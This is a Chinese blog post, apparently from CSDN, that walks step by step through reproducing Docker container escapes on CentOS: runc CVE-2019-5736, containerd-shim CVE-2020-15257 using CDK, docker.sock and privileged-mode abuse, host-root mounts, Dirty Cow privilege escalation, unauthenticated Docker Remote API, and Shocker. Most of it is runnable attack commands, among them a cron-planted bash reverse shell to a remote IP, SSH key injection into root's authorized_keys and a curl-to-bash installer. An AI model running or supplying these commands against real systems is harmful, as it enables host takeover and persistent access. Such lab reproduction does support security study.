centos系统-docker容器逃逸

最新推荐文章于 2025-02-22 16:13:33 发布
最新推荐文章于 2025-02-22 16:13:33 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 安全 文章标签: 安全性测试 百度云
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/suo_y/article/details/124292180
版权

docker-runc CVE-2019-5736(runC容器逃逸漏洞)

1、准备漏洞环境:

curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh

2、下载poc,编译脚本
a)下载poc:https://github.com/Frichetten/CVE-2019-5736-PoC
b)修改payload,将go脚本中的命令修改为反弹shell:vim main.go
在这里插入图片描述
c)、编译生成payload

  • 安装golang:yum install golang
  • 查看当前系统安装的Go语言版本:go version
  • 在/home下创建一个workspace目录,并定义 GOPATH 环境变量指向该目录,这个目录将被 Go 工具用于保存和编辑二进制文件
echo 'export GOPATH="$HOME/workspace"' >> ~/.bashrc
source ~/.bashrc
  • 编译生成payload:CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
    在这里插入图片描述
    3、将main文件放入容器中:sudo docker cp mainunruffled_newton:/tmp
    4、进入容器,并修改权限:docker exec -it unruffled_newton /bin/bash
    在这里插入图片描述
    5、执行main文件,打开新窗口,进入go脚本中的执行反弹的机器,在反弹机器中监听端口
    在这里插入图片描述
    6、打开新窗口,进入该容器
    在这里插入图片描述
    7、启动容器时,触发payload
    在这里插入图片描述
    参考:https://www.cnblogs.com/xiaozi/p/13377619.html

containerd-shim CVE-2020-15257

影响版本:containerd < 1.3.9
1、卸载docker容器:

yum remove docker docker-engine docker.io containerd runc

2、手动安装docker
rpm包下载地址:https://download.docker.com/linux/centos/7/x86_64/stable/Packages/
docker安装指导:https://docs.docker.com/engine/install/centos/#prerequisites
3、查看docker版本
在这里插入图片描述
4、下载容器:docker pull ubuntu:18.04
5、通过–net=host 作为启动参数来运行并进入一个容器:docker run -it --net=host ubuntu:18.04 /bin/bash
6、在容器内执行 cat /proc/net/unix|grep -a "containerd-shim" 可看到抽象命名空间Unix域套接字
在这里插入图片描述
7、下载cdk执行exp并实现反弹shell:

wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

8、将cdk文件拷贝到容器/tmp目录下:docker cp cdk/ reverent_mendeleev:/tmp
9、打开新窗口,攻击机器执行nc监控端口:nc -vl 12345
10、进入容器,执行文件:./cdk_linux_amd64 run shim-pwn 192.168.0.44 12345
11、成功实现容器逃逸
参考:https://blog.youkuaiyun.com/weixin_45006525/article/details/116229461

docker.sock

1、找到docker.sock:find / -name docker.sock
在这里插入图片描述
2、查看宿主机docker信息:docker -H unix:///run/docker.sock info
3、运行一个新容器并挂载宿主机根路径:docker -H unix:///run/docker.sock run -it -v /:/test ubuntu /bin/bash
4、在新容器的/test 目录下,访问到宿主机的全部资源,然后在tmp写入一个文件
5、退出容器,查看日志:grep 'msg:' /opt/XXX/logs/modescape.log
在这里插入图片描述

Procfs目录挂载逃逸

1、启动时将proc目录挂载在容器中:docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash
2、退出容器查看日志:grep 'msg:' /opt/XXX/logs/modescape.log

Ptrace逃逸PoC

1、执行命令进入容器:docker run --cap-add=SYS_PTRACE -v /root/cdk:/cdk --rm -it ubuntu bash
2、下载文件:https://github.com/0x00pf/0x00sec_code.git
3、修改infect.c文件中的shellcode:vim mem_inject/infect.c
在这里插入图片描述
4、gcc编译infect.c文件: gcc infect.c -o inject
5、执行infect文件:./inject pid
在这里插入图片描述

CAP_SYS_ADMIN

1、使用–cap-add启动容器:docker run -ti --cap-add=sys_admin ubuntu /bin/bash
2、容器内访问磁盘:fdisk -l
在这里插入图片描述

SYS_MODULE逃逸PoC

1、使用–cap-add启动容器:docker run -ti --cap-add=sys_module -v /lib/modules:/lib/modules --rm -it ubuntu bash

特权模式运行容器

1、创建一个具备–privileged=true特权参数的容器:docker run -ti --privileged=true --name 容器名称 ubuntu /bin/bash
2、查看容器是否开启特权模式:docker inspect prishiyanlou | grep Privileged
在这里插入图片描述
3、 判断当前容器是否通过特权模式起来:cat /proc/self/status |grep Cap
在这里插入图片描述
4、容器中查看主机:fdisk -l
在这里插入图片描述
5、通过mount命令将主机根目录挂载到容器中:mount /dev/vda1 /mnt
在这里插入图片描述
6、将根目录换成指定的目的目录:chroot /mnt/
7、主机中查看log日志:cat /opt/XXX/logs/modescape.log |grep 'msg'
在这里插入图片描述
参考:https://blog.51cto.com/zhaoshilei/2512328

Dirty Cow(CVE-2016-5195)

漏洞范围:Linux内核 >= 2.6.22
内核版本低于列表里的版本,表示还存在脏牛漏洞
在这里插入图片描述
1、查看Linux内核:uname -a
2、下载poc:https://github.com/FireFart/dirtycow
3、对dirty.c进行编译,生成一个dirty的可执行文件:gcc -pthread dirty.c -o dirty -lcrypt
4、执行文件:./dirty test@1234(设置你的登录密码,账户名默认为firefart)
5、登录firefart账户,成功提权
在这里插入图片描述
参考:https://www.cnblogs.com/mrliu0327/p/13456502.html

敏感目录挂载

1、挂载根目录:docker run -it -v /:/opt/test/ ubuntu /bin/bash
2、写入一个文件到tmp目录下:echo 123.txt >> tmp/secroot.txt
在这里插入图片描述
3、查看日志:grep 'msg:' /opt/XXX/logs/modescape.log
在这里插入图片描述

Docker Remote API未授权访问

方法一

1、配置远程访问:vim /usr/lib/systemd/system/docker.service

ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

在这里插入图片描述
2、重启并查看docker进程:

systemctl daemon-reload 
systemctl restart docker
ps -ef|grep docker

3、查看本机启动的容器:docker -H tcp://0.0.0.0:2375 ps
在这里插入图片描述
4、在另一台机器上创建一个名为busybox的容器:docker -H tcp://IP run -it -v /:/mnt busybox chroot /mnt sh
在这里插入图片描述
5、进入系统目录,写入ssh公钥
在这里插入图片描述
6、更改文件属性:chattr -aui /root/.ssh/authorized_keys

参考:https://zgao.top/docker-remote-api%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

方法二

1、docker守护进程监听在0.0.0.0,调用API来操作:dockersudo dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375
在这里插入图片描述
2、列出容器信息,效果与docker ps一致:curl http://0.0.0.0:2375/containers/json
3、启动容器:docker -H tcp://0.0.0.0:2375 ps -a
4、在目标机器上新运行一个容器,挂载点设置为服务器的根目录挂载至/mnt目录下:

docker -H tcp://192.168.0.41 run -it -v /:/mnt nginx:latest /bin/bash

4、在容器内执行命令,将反弹shell的脚本写入到/var/spool/cron/root:

echo '* * * * * /bin/bash -i >& /dev/tcp/192.168.0.41/12345 0>&1' >> /mnt/var/spool/cron/crontabs/root

5、本地监听端口:nc -vl 12345
6、等待定时任务达到逃逸目的

Shocker 攻击

漏洞影响版本: Docker版本< 1.0, 存在于 Docker 1.0 之前的绝大多数版本
1、下载shocker文件:https://github.com/gabrtv/shocker
2、gcc编译shocker.c文件:gcc shocker.c -o shocker
在这里插入图片描述
3、执行文件:docker run gabrtv/shocker

参考:https://www.cnblogs.com/xiaozi/p/13423853.html

Dirtycow脏牛(CVE-2016-5195)容器逃逸漏洞复现与分析
SHELLCODE_8BIT的博客
08-07 718
众所周知,操作系统为我们管理硬件资源,并以系统调用的方式对用户进程提供 API,但是 syscall 很慢,涉及陷入内核以及上下文切换。对于少量频繁调用的系统调用(比如获取当期系统时间)来说,是否可以某种安全的方式开放到用户空间,让用户直接访问而不需要经过 syscall 呢?vDSO 就是用来解决这个问题的。vDSO 全程为这个名词大家应该有所耳闻,就是 Linux 下的动态库的全称,而virtual表明,这个动态库是通过某种手段虚拟出来的,并不真正存在于 Linux 文件系统中。
CVE-2024-21626 容器逃逸漏洞+修复方式
xdxghy0921
02-08 5122
CVE-2024-21626处理方案
docker逃逸复现(CVE-2020-15257-host模式容器逃逸漏洞)
m0_63306943的博客
02-28 1500
因为docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个 Docker 容器内部可以操作该容器的外部资源,一般理解为操作宿主机的行为。叫做docker逃逸。host模式这种模式下,容器和主机已经没有网络隔离了,它们共享同一个网络命名空间,容器的网络配置和主机完全一样,使用主机的IP地址和端口,可以查看到主机所有网卡信息、网络资源,在网络性能上没有损耗。但也正是因为没有网络隔离,容器和主机容易产生网络资源冲突、争抢,以及其他的一些问题。
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
SuperherRo的博客
03-03 1618
1、云原生-Docker安全-容器逃逸&内核漏洞 2、云原生-Docker安全-容器逃逸&版本漏洞 3、云原生-Docker安全-容器逃逸&CDK自动化
后渗透——Docker容器逃逸
最新发布
未完成的歌~的博客
02-22 1109
在渗透测试中,如果获取了目标主机的 shell,但发现其运行在 docker 环境中,要进一步渗透,就需要逃逸到宿主机。另外,还可能存在更复杂的场景,例如物理机运行虚拟机,虚拟机再运行 docker 容器,这种情况下还需要实现虚拟机逃逸。本文主要总结关于 docker 容器逃逸的相关技术与方法。涉及内核漏洞的提权原理都比较复杂,很难理解,会用 poc 就行了。其余逃逸很大程度都是通过挂载进行逃逸。要么本容器挂载,要么本容器里再创建一个容器挂载。
Docker容器逃逸漏洞复现(CVE-2020-15257)
weixin_45006525的博客
04-28 699
Docker容器逃逸漏洞复现(CVE-2020-15257) 漏洞简介 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd &
【云原生渗透】- docker runc容器逃逸漏洞(CVE-2019-5736)
神棍之路
01-11 1448
运行时存在安全漏洞,攻击者可以通过特定的容器镜像或者exec操作,来获取到宿主机的runc执行时的文件句柄,并修改掉runc的二进制文件,从而可以在宿主机上以root身份执行命令。containerd 向下通过 containerd-shim 结合 runC,使得引擎可以独立升级,避免之前 Docker Daemon 升级会导致所有容器不可用的问题。将该payload拷贝到docker容器中(这就是模拟攻击者获取了docker容器权限,在容器中上传payload进行docker逃逸
云安全-云原生基于容器漏洞的逃逸自动化手法(CDK check)
告白的博客
11-01 2211
上面可以看到逃逸的种类的以及其中的方法很多,但是实际环境中,是时间紧任务重,一步步的尝试逃逸难免有些费事,这里列举两种工具,CDK和check,集成了自动逃逸方法检测,CDK还集成了对应的poc实现一键逃逸,满足下列的版本时候,可以尝试该docker漏洞逃逸提权,详细的实验过程这里不作赘述,相关的操作网上也有大量的文章,但是实际的环境去逃逸,还是就事论事,会有许多的其他情况发生。CDK的自动化逃逸中包含了挂载,特权等许多的自动化利用,上述的两种逃逸类型为docker的漏洞,分别是。
容器逃逸Docker runc(CVE-2019-5736)漏洞复现与分析
SHELLCODE_8BIT的博客
08-08 1156
【代码】Docker runc(cve-2019-5736)漏洞复现与分析。
Docker逃逸--runc容器逃逸漏洞(CVE-2019-5736)
热门推荐
07-26 2万+
漏洞简述: 攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runc执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。 利用条件: Docker版本 < 18.09.2,runc版本< 1.0-rc6。(在Docker 18.09.2之前的版本中使用了的runc版本小于1.0-rc6。) 可通过 dockerdocker-r...
centos7.6安装docker
ZJT6666666的博客
12-20 2217
小菜比的我想在自己vps上搭建一个方便的靶场,就想到了用docker搭建,下面是自己亲自搭建过程,没有出错。
Docker 逃逸 漏洞复现
Jack_chao_的博客
03-27 1489
CVE-2020-15257-host模式容器逃逸漏洞分析
docker容器逃逸学习篇
weixin_46148739的博客
09-10 1715
本文对常见docker逃逸漏洞做了总结,包含漏洞环境的搭建,原理说明,利用方式,以及cdk工具的简单介绍等将cdk传入你拿下的容器cdk工具丢到你的公网服务器,并且监听端口CDK包括三个功能模块Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。Exploit: 提供容器逃逸、持久化、横向移动等利用方式。Tool: 修复渗透过程中常用的linux命令以及与Docker/K8s API交互的命令。# 容器内部信息收集# 查看可利用的payload# 利用Exploit 模块。
分享:一款可以检测容器逃逸风险的开源工具
weixin_43742792的博客
03-01 624
什么是容器逃逸逃逸风险自检、问脉功能介绍、应用场景演示。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2473
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
docker逃逸方法汇总与简要分析
2401_84466336的博客
08-07 1731
Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,它允许用户通过RESTful API与Docker引擎进行交互,这意味着开发人员可以使用HTTP请求来远程管理和控制Docker引擎,包括创建、启动、停止和删除容器,构建和管理镜像,以及执行其他与Docker相关的操作。
Docker容器逃逸总结
SHELLCODE_8BIT的博客
03-12 2421
3.1 特权容器,特权容器下,所有capabiltiy都拥有,并且对设备/dev可见。1.1 条件竞争类dirtypipe + dac_search,dirtycow。以下几个如果被挂载,都会被可写,造成逃逸。1.2 内核漏洞,uaf等等。
Day96:云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
qq_61553520的博客
04-11 1087
小迪安全-Day96:云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值